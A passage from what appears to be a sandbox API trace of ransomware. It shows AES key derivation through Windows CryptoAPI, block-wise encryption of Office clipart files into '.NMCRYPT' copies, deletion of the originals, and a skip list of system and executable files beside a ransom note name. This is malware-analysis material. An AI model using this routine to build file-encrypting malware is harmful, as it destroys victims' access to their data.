phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0204.159] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.159] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad1f8) returned 1 [0204.159] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.159] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.159] wcslen (_String="\\\\?\\") returned 0x4 [0204.196] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 1 [0204.196] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf")) returned 1 [0204.199] CryptDestroyKey (hKey=0x9ad338) returned 1 [0204.199] wcslen (_String="OK") returned 0x2 [0204.199] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.199] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.199] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0204.199] CryptDestroyHash (hHash=0x9ad378) returned 1 [0204.199] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0204.203] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0204.203] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.203] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad138) returned 1 [0204.203] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.203] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.203] wcslen (_String="\\\\?\\") returned 0x4 [0204.265] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 1 [0204.265] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf")) returned 1 [0204.267] CryptDestroyKey (hKey=0x9ad238) returned 1 [0204.267] wcslen (_String="OK") returned 0x2 [0204.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.267] CryptDestroyKey (hKey=0x9ad138) returned 1 [0204.267] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0204.267] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0204.269] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0204.269] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.269] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad8b8) returned 1 [0204.269] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.269] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.269] wcslen (_String="\\\\?\\") returned 0x4 [0204.300] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 1 [0204.300] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf")) returned 1 [0204.301] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0204.302] wcslen (_String="OK") returned 0x2 [0204.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.302] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0204.302] CryptDestroyHash (hHash=0x9ad338) returned 1 [0204.302] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0204.304] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0204.304] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.304] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad8b8) returned 1 [0204.304] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.304] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.304] wcslen (_String="\\\\?\\") returned 0x4 [0204.316] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 1 [0204.316] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf")) returned 1 [0204.317] CryptDestroyKey (hKey=0x9ad238) returned 1 [0204.317] wcslen (_String="OK") returned 0x2 [0204.317] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.317] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.317] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0204.317] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0204.317] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0204.320] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0204.320] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.320] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad478) returned 1 [0204.320] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.320] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.320] wcslen (_String="\\\\?\\") returned 0x4 [0204.327] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 1 [0204.327] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf")) returned 1 [0204.328] CryptDestroyKey (hKey=0x9ad638) returned 1 [0204.328] wcslen (_String="OK") returned 0x2 [0204.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.328] CryptDestroyKey (hKey=0x9ad478) returned 1 [0204.328] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0204.328] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0204.331] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0204.331] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.331] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad7b8) returned 1 [0204.331] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.331] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.331] wcslen (_String="\\\\?\\") returned 0x4 [0204.348] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 1 [0204.349] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf")) returned 1 [0204.350] CryptDestroyKey (hKey=0x9ad778) returned 1 [0204.350] wcslen (_String="OK") returned 0x2 [0204.350] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.350] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.350] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0204.350] CryptDestroyHash (hHash=0x9ad438) returned 1 [0204.350] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0204.352] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0204.352] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.352] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad478) returned 1 [0204.352] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.352] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.352] wcslen (_String="\\\\?\\") returned 0x4 [0204.422] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 1 [0204.422] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf")) returned 1 [0204.423] CryptDestroyKey (hKey=0x9ad178) returned 1 [0204.423] wcslen (_String="OK") returned 0x2 [0204.423] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.423] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.423] CryptDestroyKey (hKey=0x9ad478) returned 1 [0204.423] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0204.423] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0204.424] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0204.424] PathMatchSpecW (pszFile="HM00172_.WMF", pszSpec="*NMCRYPT") returned 0 [0204.424] PathMatchSpecW (pszFile="HM00172_.WMF", pszSpec="*Recovers your files.html") returned 0 [0204.425] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0204.425] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0204.425] CryptAcquireContextW (in: phProv=0x1d4449e8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1d4449e8*=0x8e35d8) returned 1 [0204.426] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0204.426] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.426] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad7f8) returned 1 [0204.426] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.426] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.426] wcslen (_String="\\\\?\\") returned 0x4 [0204.426] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad138) returned 1 [0204.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0204.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0204.427] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=2832) returned 1 [0204.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0204.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.442] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.442] GetLastError () returned 0x0 [0204.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.451] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.451] GetLastError () returned 0x0 [0204.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.451] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.451] GetLastError () returned 0x0 [0204.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.451] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.451] GetLastError () returned 0x0 [0204.451] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.451] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.452] GetLastError () returned 0x0 [0204.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.452] GetLastError () returned 0x0 [0204.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.452] GetLastError () returned 0x0 [0204.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.452] GetLastError () returned 0x0 [0204.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.452] GetLastError () returned 0x0 [0204.452] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.452] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.452] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.453] GetLastError () returned 0x0 [0204.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.453] GetLastError () returned 0x0 [0204.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x10, lpOverlapped=0x0) returned 1 [0204.453] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x10, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x20) returned 1 [0204.453] GetLastError () returned 0x0 [0204.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x20, lpOverlapped=0x0) returned 1 [0204.453] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0204.453] WriteFile (in: hFile=0x15c4, lpBuffer=0x2894780*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0204.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf")) returned 0x220 [0204.453] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF", dwFileAttributes=0x220) returned 1 [0204.454] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 1 [0204.454] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf")) returned 1 [0204.455] CryptDestroyKey (hKey=0x9ad138) returned 1 [0204.455] wcslen (_String="OK") returned 0x2 [0204.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.455] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0204.455] CryptDestroyHash (hHash=0x9ad378) returned 1 [0204.455] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0204.455] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*NMCRYPT") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*Recovers your files.html") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.exe") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.dll") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.lnk") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.bat") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.ini") returned 0 [0204.455] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.msi") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*.scf") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*pagefile.sys*") returned 0 [0204.456] PathMatchSpecW (pszFile="HM00426_.WMF", pszSpec="*NTUSER.DAT*") 